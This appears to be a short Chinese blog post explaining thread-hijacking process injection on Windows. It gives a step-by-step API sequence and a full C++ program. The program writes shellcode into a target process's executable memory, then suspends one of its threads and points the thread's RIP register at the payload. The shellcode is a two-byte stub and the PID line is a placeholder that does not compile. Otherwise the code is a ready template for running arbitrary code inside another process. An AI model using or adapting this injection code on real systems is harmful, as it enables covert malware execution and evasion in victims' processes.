线程劫持注入技术
线程劫持注入
原理
利用线程劫持技术注入远程进程。
实现流程
OpenProcess打开要注入的进程句柄targetProcessHandleVirtualAllocEx在目标进程中分配可执行内存remoteBufferWriteProcessMemory将remoteBuffer中的 Shellcode 写入内存- 在目标进程中找到要劫持的线程ID。
CreateToolhelp32Snapshot创建快照并Thread32Next枚举,获取要劫持的线程ID OpenThread打开要劫持的线程句柄threadHijackedSuspendThread挂起目标线程挂起目标线程GetThreadContext获取目标线程上下文- 将目标线程指令指针(
RIP寄存器)指向 shellcoderemoteBuffer SetThreadContext设置被劫持线程的新上下文ResumeThread恢复被劫持线程
示例代码
#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
int main()
{
unsigned char shellcode[] =
"\xfc\x48";
HANDLE targetProcessHandle;
PVOID remoteBuffer;
HANDLE threadHijacked = NULL;
HANDLE snapshot;
THREADENTRY32 threadEntry;
CONTEXT context;
DWORD targetPID = "这里填PID";
context.ContextFlags = CONTEXT_FULL;
threadEntry.dwSize = sizeof(THREADENTRY32);
targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
remoteBuffer = VirtualAllocEx(targetProcessHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(targetProcessHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
Thread32First(snapshot, &threadEntry);
while (Thread32Next(snapshot, &threadEntry))
{
if (threadEntry.th32OwnerProcessID == targetPID)
{
threadHijacked = OpenThread(THREAD_ALL_ACCESS, FALSE, threadEntry.th32ThreadID);
break;
}
}
SuspendThread(threadHijacked);
GetThreadContext(threadHijacked, &context);
context.Rip = (DWORD_PTR)remoteBuffer;
SetThreadContext(threadHijacked, &context);
ResumeThread(threadHijacked);
}
文档信息
- 本文作者:Nattevak
- 本文链接:https://HLuKT.github.io/2023/05/05/Thread-Hijacking-Inject/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)